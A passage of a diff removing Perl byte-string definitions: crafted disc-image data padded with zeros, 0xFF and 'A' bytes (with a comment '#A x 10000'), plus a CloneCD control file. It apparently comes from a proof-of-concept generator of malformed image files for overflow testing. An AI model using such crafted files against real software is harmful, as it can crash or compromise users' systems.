-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x75\xFA".
-	        "\xE7\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xD7\xF5\x3C\x00\xCB\x00\x00\x00\x00\x00\x00\xCB\x00\xFB\x00\x00\x00\x00\xFB\x00".
-	        "\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5\xF5\x00\x3C\x00\xE3\x00\x00\x00\x00\x00\x00\xE3\x00\xFB\x00\x00\x00\x00".
-	        "\xFB\x00\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5\xF5\xF5\x00\x00\x9F\x13\x34\xC5\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\xF5\xE5\xF4\x1E\x00\xEB\x00\x00\x00\x00\x00\x00\xEB\x00\xF3\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5\x00\x00".
-	        "\xF4\x00\x00\xF4\xF4\x00\x1E\x00\xFF\x00\x00\x00\x00\x00\x00\xFF\x00\xF3\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5".
-	        "\x00\x00\xF4\x00\x00\xF4\xF4\xF4\x00\x00\xEA\xE9\xD3\x86\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\x00\xBD\x00\x52\x00\x37\x55\x00".
-	        "\x8C\x00\x41\x00\x6E\xA0\x5E\x50\x54\xF0\x0A\x2D\x9C\xB3\x47\x8B\xFE\xBC\xC9\x2A\x98\x3F\x60\xCE\x2A\xC7\x64\xE4\xFF\x9D\x34\x4C".
-	        "\x00\xFC\xDC\x18\x27\xED\x9F\x2E\x03\xE6\x00\x60\x00\xAD\x00\xA5\x00\x2B\xB6\x00\x4F\x00\xB6\x00\xB8\x55\xAA\xA4\xA0\xF1\xB3\xDA".
-	        "\xD8\xF8\xE4\x44\xF4\xD6\x0A\x37\xF3\xCE\x9C\xCF\xDE\xC9\x90\xDD\x46\x89\x97\x64\x29\x0C\x4D\xE7\xE7\xEC\xC6\x29\x39\x12\x00\xFF".
-	        "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x33\x01"."\x41" x 8;
-                #A x 10000
-my $img_data4 = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\xB3\x61\xEB\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\xF7\x22\xF5\x7E\x7E\x7E\x7E\x7E\x7E\x7E\x7E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6C\xC8\xA3\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\x11\xF4\x3F\x3F".
-	        "\x3F\x3F\x3F\x3F\x3F\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x48\x7B\xC2\xCB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\xF7\x9A\xBE\xBB\x20\x31\x69\x10\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x1B\xCB\xCB\x52\x52\xA4\xA4\xC5\x2D".
-	        "\xA6\xAC\x45\xE6\x00\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\x71\x39\x28\x8E\x32".
-	        "\x21\x6B\x00\x00\x00\x00\x00\x00\x00\x00\x65\x65\x8A\x8A\x52\x52\xA4\xA4\x99\xA6\xF6\xEE\x76\x12";
-my $ccd_data =  "\x5B\x43\x6C\x6F\x6E\x65\x43\x44\x5D\x0D\x0A\x56\x65\x72\x73\x69\x6F\x6E\x3D\x33\x0D\x0A\x5B\x44\x69\x73\x63\x5D\x0D\x0A\x54\x6F".
-	        "\x63\x45\x6E\x74\x72\x69\x65\x73\x3D\x34\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x73\x3D\x31\x0D\x0A\x44\x61\x74\x61\x54\x72\x61\x63".
-	        "\x6B\x73\x53\x63\x72\x61\x6D\x62\x6C\x65\x64\x3D\x30\x0D\x0A\x43\x44\x54\x65\x78\x74\x4C\x65\x6E\x67\x74\x68\x3D\x30\x0D\x0A\x5B".
-	        "\x53\x65\x73\x73\x69\x6F\x6E\x20\x31\x5D\x0D\x0A\x50\x72\x65\x47\x61\x70\x4D\x6F\x64\x65\x3D\x31\x0D\x0A\x50\x72\x65\x47\x61\x70".
-	        "\x53\x75\x62\x43\x3D\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x30\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F".
-	        "\x69\x6E\x74\x3D\x30\x78\x61\x30\x0D\x0A\x41\x44\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34".
-	        "\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72".
-	        "\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x31".
-	        "\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D\x0A\x50\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x34\x33\x35\x30\x0D\x0A\x5B".
-	        "\x45\x6E\x74\x72\x79\x20\x31\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x61\x31\x0D".
-	        "\x0A\x41\x44\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F".
-	        "\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C".
-	        "\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x31\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D".
-	        "\x0A\x50\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x34\x33\x35\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x32\x5D\x0D".
-	        "\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x61\x32\x0D\x0A\x41\x44\x52\x3D\x30\x78\x30\x31".
-	        "\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D".
-	        "\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A".
-	        "\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x30\x0D\x0A\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46\x72\x61\x6D\x65\x3D\x33".
-	        "\x34\x0D\x0A\x50\x4C\x42\x41\x3D\x33\x34\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x33\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31".
-	        "\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x30\x31\x0D\x0A\x41\x44\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D".
-	        "\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D".
-	        "\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D".
-	        "\x69\x6E\x3D\x30\x0D\x0A\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x30\x0D\x0A".
